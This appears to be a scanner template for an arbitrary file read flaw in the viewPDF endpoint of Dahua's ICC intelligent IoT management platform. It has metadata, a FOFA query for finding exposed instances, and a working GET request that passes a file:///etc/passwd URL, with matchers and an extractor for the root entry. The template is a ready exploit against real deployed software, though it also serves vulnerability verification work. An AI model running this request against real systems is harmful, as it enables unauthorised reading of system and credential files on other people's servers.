## id: VEID-2025-1210
## name: 大华ICC智能物联综合管理平台viewPDF存在任意文件读取
## author: hack007x
## severity: high
## tags: veid,file,veid2025
## description: 该漏洞出现在viewPDF?filename=x.pdf&pdfUrl=file: 可任意文件按读取
## fofa-query: body="location.hash.indexOf('/authLogin')" || body="客户端会小于800" || title="智能物联综合管理平台" || body="* 客户端会小于800*" || body="/static/fontshd/font-hd.css"
## verification: true


GET /evo-apigw/evo-cirs/material/viewPDF?filename=x.pdf&pdfUrl=file:///etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}

#@ condition: and
#@ matcher: status_code == 200
#@ matcher: header["Content-Type"] contains "pdf"
#@ matcher: body matches /root:[^\n]+/
#> extract: name=passwd_root, from=body, regex=/(root:[^\n]+)/, group=1





# @VEIL-STAMP: bde6d925e52614b35a71a860d2654ca802bc856b6129e143aa5c098d97e2f4de
